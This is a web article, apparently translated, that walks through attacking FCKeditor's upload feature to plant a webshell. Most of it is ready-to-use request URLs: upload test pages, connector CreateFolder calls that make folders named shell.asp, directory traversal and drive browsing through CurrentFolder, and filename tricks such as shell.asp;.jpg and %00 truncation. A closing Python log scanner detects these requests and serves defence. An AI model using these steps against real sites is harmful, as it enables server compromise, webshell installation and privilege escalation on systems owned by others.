I. About FCKeditor
FCKeditor is a web-based rich text editor that is used in many content management systems.
This article briefly outlines how an attack through the FCKeditor upload vulnerability proceeds and collects the operations that may be involved.
II. Attack approach
1. Check the FCKeditor version
http://127.0.0.1/fckeditor/editor/dialog/fck_about.html
http://127.0.0.1/FCKeditor/_whatsnew.html
2. Test upload points
FCKeditor/editor/filemanager/browser/default/connectors/test.html
FCKeditor/editor/filemanager/upload/test.html
FCKeditor/editor/filemanager/connectors/test.html
FCKeditor/editor/filemanager/connectors/uploadtest.html
FCKeditor/_samples/default.html
FCKeditor/_samples/asp/sample01.asp
FCKeditor/_samples/asp/sample02.asp
FCKeditor/_samples/asp/sample03.asp
FCKeditor/_samples/asp/sample04.asp
FCKeditor/editor/fckeditor.htm
FCKeditor/editor/fckdialog.html
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/php/connector.php
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/jsp/connector.jsp
FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp
fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/aspx/connector.Aspx
fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Con
3. Bypassing restrictions
3.1 Upload restrictions
There are many ways to bypass upload restrictions; the main ones are intercepting the request and changing the extension, %00 truncation, and adding a file header.
3.2 Filename restrictions
3.2.1 Uploading twice to bypass the rewriting of "." to "_" in filenames
After a file such as shell.asp;.jpg is uploaded, FCK automatically renames it to shell_asp;.jpg. Uploading a file with the same name again results in the filename shell.asp;(1).jpg.
3.2.2 Bypass by submitting shell.php followed by a space
The trailing space only works on Windows; Linux does not support it. Submitting shell.php followed by a space can bypass the filename restriction.
3.3 Bypassing folder restrictions on IIS 6.0
Fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=File&CurrentFolder=/shell.asp&NewFolderName=z.asp
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/shell.asp&NewFolderName=z&uuid=1244789975684
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp
3.4 File parsing restrictions
On the file upload page of the FCKeditor editor, create a folder such as 1.asp, then upload an image-format webshell file into that folder to obtain a shell.
http://127.0.0.1/images/upload/201806/image/1.asp/1.jpg
4. Directory listing
4.1 FCKeditor/editor/fckeditor.html
FCKeditor/editor/fckeditor.html cannot upload files itself, but clicking the upload image button and then "Browse Server" jumps to a page where files can be uploaded, and the files already uploaded can be viewed there.
4.2 Viewing the site directory from the XML response
http://127.0.0.1/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../../&NewFolderName=shell.asp
4.3 Getting the current folder
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?
Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?
Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?
Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
4.4 Browsing files on the E: drive
/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=e:/
5. Connecting to the trojan
Once the server can parse (execute) the trojan, use any of the usual tools to connect to it and obtain a webshell. At this point the process of exploiting FCKeditor for file upload and attack is complete.
III. Other
After obtaining a webshell, a great many operations are possible, privilege escalation is convenient, and taking over the host is not difficult.
To defend against this vulnerability, all upload points can be removed and directory access restricted.
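As an added defensive example that is not part of the original article, the following Python scans web-server access-log lines for the connector request patterns listed above: probes of the test and sample pages, CreateFolder requests whose folder name carries an executable extension, and CurrentFolder values containing traversal or a drive letter. The log lines, IP addresses and timestamps are constructed sample input.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (common log format) used as sample input.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jun/2018:10:00:01 +0800] "GET /fckeditor/editor/dialog/fck_about.html HTTP/1.1" 200 512
10.0.0.5 - - [01/Jun/2018:10:00:02 +0800] "GET /FCKeditor/editor/filemanager/connectors/test.html HTTP/1.1" 200 812
10.0.0.5 - - [01/Jun/2018:10:00:03 +0800] "GET /FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/&NewFolderName=shell.asp HTTP/1.1" 200 120
10.0.0.5 - - [01/Jun/2018:10:00:04 +0800] "GET /fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=e:/ HTTP/1.1" 200 3000
10.0.0.9 - - [01/Jun/2018:10:00:05 +0800] "GET /index.html HTTP/1.1" 200 4000
"""

REQ_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')
# Server-side extensions that must never appear in a folder or upload name.
EXEC_EXT_RE = re.compile(r'\.(asp|aspx|asa|cer|cdx|php|jsp|jspx)\b', re.I)
# Version/test pages from section 1 and 2 that a normal editor user never requests.
PROBE_RE = re.compile(r'/fckeditor/(editor/filemanager/.*/test\.html|editor/filemanager/.*/uploadtest\.html|_samples/|_whatsnew\.html|editor/dialog/fck_about\.html)', re.I)

def classify(url):
    """Return the reasons a request URL looks like FCKeditor connector abuse."""
    parts = urlsplit(url)
    path = parts.path.lower()
    q = {k.lower(): v[0] for k, v in parse_qs(parts.query).items()}
    reasons = []
    if PROBE_RE.search(path):
        reasons.append("fckeditor-probe")
    if "/fckeditor/" in path and "connector." in path:
        cmd = q.get("command", "").lower()
        folder = q.get("currentfolder", "")
        name = q.get("newfoldername", "")
        if cmd == "createfolder" and EXEC_EXT_RE.search(name):
            reasons.append("createfolder-executable-name")
        if ".." in folder or re.match(r'^[a-z]:', folder, re.I):
            reasons.append("path-traversal-or-drive")
        if EXEC_EXT_RE.search(folder):
            reasons.append("executable-folder-name")
    return reasons

def scan(log_text):
    """Parse each log line and collect (ip, url, reasons) for suspicious requests."""
    alerts = []
    for line in log_text.splitlines():
        m = REQ_RE.match(line)
        if not m:
            continue
        reasons = classify(m["url"])
        if reasons:
            alerts.append((m["ip"], m["url"], reasons))
    return alerts
```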
Original article, author: 投稿專員 (contributor). If reproduced, please cite the source: https://www.506064.com/zh-hk/n/209379.html